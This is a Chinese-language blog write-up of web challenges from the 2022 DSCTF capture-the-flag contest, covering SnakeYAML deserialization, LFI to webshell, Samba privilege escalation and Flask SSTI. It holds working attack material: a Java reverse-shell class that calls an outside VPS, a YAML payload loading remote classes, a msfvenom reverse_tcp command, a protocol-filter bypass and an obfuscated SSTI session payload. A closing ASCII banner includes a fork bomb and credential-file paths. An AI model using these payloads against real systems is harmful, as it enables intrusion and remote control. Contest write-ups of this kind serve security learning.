Y0ng的博客
0%

2022 DSCTF首届数字空间安全攻防大赛

发表于 分类于

image-20220717032916350

师傅们带的起飞,弱鸡web狗在线卑微 :(

easy_yaml

访问html给了源码


    public ShiroFilterFactoryBean shiroFilter() {
        ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
        bean.setSecurityManager((org.apache.shiro.mgt.SecurityManager) securityManager());
        bean.setLoginUrl("/login");
        Map<String, String> filterMap = new LinkedHashMap<>();
        filterMap.put("/static/*","anon");
        filterMap.put("/load/*", "authc");
        bean.setFilterChainDefinitionMap(filterMap);
        return bean;
    }

    @PostMapping(value = "/load/{id}")
    @ResponseBody
    public String loadyaml(@PathVariable(name = "id") String id, @RequestParam(name = "persondata", defaultValue = "") String persondata) throws IOException, ClassNotFoundException {
        Yaml yaml = new Yaml();
        Person p = yaml.loadAs(persondata, Person.class);
        return p.username;
    }

    public class Address {
    public String street;
    public Object ext;
    public boolean isValid;
}
public class Person  {
    public String username;
    public String age;
    public boolean isLogin;
    public Address address;
}

存在一个yaml的反序列化点,先构造探测出网否。还有一个shiro的权限绕过

http://39.105.38.203:30113/load/%3badmin
POST:
persondata=username: Chris
address:
    ext: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://150.158.181.145:3000"]]]]

出网

image-20220715154539946

下载yaml反序列化exp:https://github.com/artsploit/yaml-payload

直接构造poc,利用socket反弹shell:使用Java反弹shell | Spoock

package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() throws Exception{
        try {

            String host="xxx.xxx";  //vps ip
            int port=3000;  //vps port
            String cmd="/bin/sh";
            Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
            java.net.Socket s=new java.net.Socket(host,port);
            java.io.InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
            java.io.OutputStream po=p.getOutputStream(),so=s.getOutputStream();
            while(!s.isClosed()) {
                while(pi.available()>0) {
                    so.write(pi.read());
                }
                while(pe.available()>0) {
                    so.write(pe.read());
                }
                while(si.available()>0) {
                    po.write(si.read());
                }
                so.flush();
                po.flush();
                Thread.sleep(50);
                try {
                    p.exitValue();
                    break;
                }
                catch (Exception e){
                }
            };
            p.destroy();
            s.close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    @Override
    public String getEngineName() {
        return null;
    }

    @Override
    public String getEngineVersion() {
        return null;
    }

    @Override
    public List<String> getExtensions() {
        return null;
    }

    @Override
    public List<String> getMimeTypes() {
        return null;
    }

    @Override
    public List<String> getNames() {
        return null;
    }

    @Override
    public String getLanguageName() {
        return null;
    }

    @Override
    public String getLanguageVersion() {
        return null;
    }

    @Override
    public Object getParameter(String key) {
        return null;
    }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) {
        return null;
    }

    @Override
    public String getOutputStatement(String toDisplay) {
        return null;
    }

    @Override
    public String getProgram(String... statements) {
        return null;
    }

    @Override
    public ScriptEngine getScriptEngine() {
        return null;
    }
}

编译打包,放到服务器上

javac src/artsploit/AwesomeScriptEngineFactory.java   //会生成一个AwesomeScriptEngineFactory.class文件
jar -cvf yaml-payload.jar -C src/ .		//将src目录下的文件打包为yaml-payload.jar的jar包

image-20220715160502638

FLAG:flag{0831778476e75b691c4396d1297e748e}

easy_tou

开局一个include,利用无临时文件进行getshell:hxp CTF 2021 - The End Of LFI?,文章写的是直接系统命令,为了方便先获取webshell,参见项目:wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT,把test.py中的base64改成一句话

image-20220715104322379

获得内核信息

http://47.93.179.206:30004/?file=/proc/version

Linux version 5.4.0-113-generic (buildd@lcy02-amd64-067) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #127-Ubuntu SMP Wed May 18 14:30:56 UTC 2022

www权限,没有找到flag,尝试提权,suid和pkexec均失败。端口扫描居然开了445端口

image-20220716235105014

找到linux的445端口渗透文章:CVE-2017-7494 Samba远程命令执行漏洞复现

msf直接来个马,翻看/etc/hosts 发现路由为172.17.0.0/24,msf加上路由

image-20220717015438171

这里切换target为command,然后发送的paylaod为python的反弹shell。

image-20220717020119379

run一下,收到root权限

image-20220717020235080

但是没法读文件,再生成个马,root执行

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=ip LPORT=6666 -f elf > root.elf

handler监听,收到shell,dir/cat一下就行了。

image-20220717021955463

Pingpngping

admin/admin登录,flask2.1.2 python3.8

给了一段代码,一看麻了

url = str(request.form.get('url')).lower()
urlarr = urlparse(url)
for black in ['dict', 'file', 'gopher', 'ftp']:
    if black in urlarr['scheme']:
        return "NoNoNO!!!You can't use {} protocol".format(black)
    try:
        res = urlopen(url)
        return render_template("ping.html")
    except:
        return "Request failed!"

username估摸能SSTI注入,fuzz麻了。题目通过session解密获得username并进行渲染,直接解session肯定需要 secret_key,如果知道key,就可以直接伪造cookie然后SSTI。

image-20220715211401122

大量时间去写fuzz了username,卡死到这道题。

WP:利用换行绕过了协议的限制

url=
file:///etc/passwd

尝试自己做一下,先读取app.py,知道key是命令行传入

SECRET_KEY=str(sys.argv[1])

读取cmdline,获得key:Guess_fl4gName

/proc/self/cmdline

然后伪造就行了,抄个payload

{% print(url_for["__glo""bals__"])["__g""etitem__"]("o""s")["p""open"](url_for["__glo""bals__"]["requ""est"]["args"]["g""et"]("guoke"))["re""ad"]() %}

生成session

python3 flask_session_cookie_manager3.py encode -s "Guess_fl4gName"  -t "{'username':'{% if(url_for[\"__glo\"\"bals__\"])[\"__g\"\"etitem__\"](\"o\"\"s\")[\"p\"\"open\"](url_for[\"__glo\"\"bals__\"][\"requ\"\"est\"][\"args\"][\"g\"\"et\"](\"guoke\"))[\"re\"\"ad\"]() %}{% endif %}'}"

image-20220717031029178

反思

easy_tou 在做题的时候用蚁剑的插件随后扫了一下端口,当时也没觉得445能有什么利用的,win的SMB倒是可以尝试利用17010,但是开在linux上真的挺容易忽略的,linux版的永恒之蓝,学到了。下回注意端口。

ping那道纯粹因为讨厌SSTI,不想做,不过整体思路是有的,拿key->伪造session->SSTI->bypass。

另外真心佩服guoke,唯一ak了web的男人。

                            
                        `:oDFo:`                            
                     ./ymM0dayMmy/.                          
                  -+dHJ5aGFyZGVyIQ==+-                    
              `:sm⏣~~Destroy.No.Data~~s:`                
           -+h2~~Maintain.No.Persistence~~h+-              
       `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`          
    ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.      
 -++SecKCoin++e.AMd`       `.-://///+hbove.913.ElsMNh+-    
-~/.ssh/id_rsa.Des-                  `htN01UserWroteMe!-  
:dopeAW.No<nano>o                     :is:TЯiKC.sudo-.A:  
:we're.all.alike'`                     The.PFYroy.No.D7:  
:PLACEDRINKHERE!:                      yxp_cmdshell.Ab0:    
:msf>exploit -j.                       :Ns.BOB&ALICEes7:    
:---srwxrwx:-.`                        `MS146.52.No.Per:    
:<script>.Ac816/                        sENbove3101.404:    
:NT_AUTHORITY.Do                        `T:/shSYSTEM-.N:    
:09.14.2011.raid                       /STFU|wall.No.Pr:    
:hevnsntSurb025N.                      dNVRGOING2GIVUUP:    
:#OUTHOUSE-  -s:                       /corykennedyData:    
:$nmap -oS                              SSo.6178306Ence:    
:Awsm.da:                            /shMTl#beats3o.No.:    
:Ring0:                             `dDestRoyREXKC3ta/M:    
:23d:                               sSETEC.ASTRONOMYist:    
 /-                        /yo-    .ence.N:(){ :|: & };:    
                           `:Shall.We.Play.A.Game?tron/    
                           ```-ooy.if1ghtf0r+ehUser5`    
                         ..th3.H1V3.U2VjRFNN.jMh+.`          
                        `MjM~~WE.ARE.se~~MMjMs              
                         +~KANSAS.CITY's~-`                  
                          J~HAKCERS~./.`                    
                          .esc:wq!:`                        
                           +++ATH`                            
                            `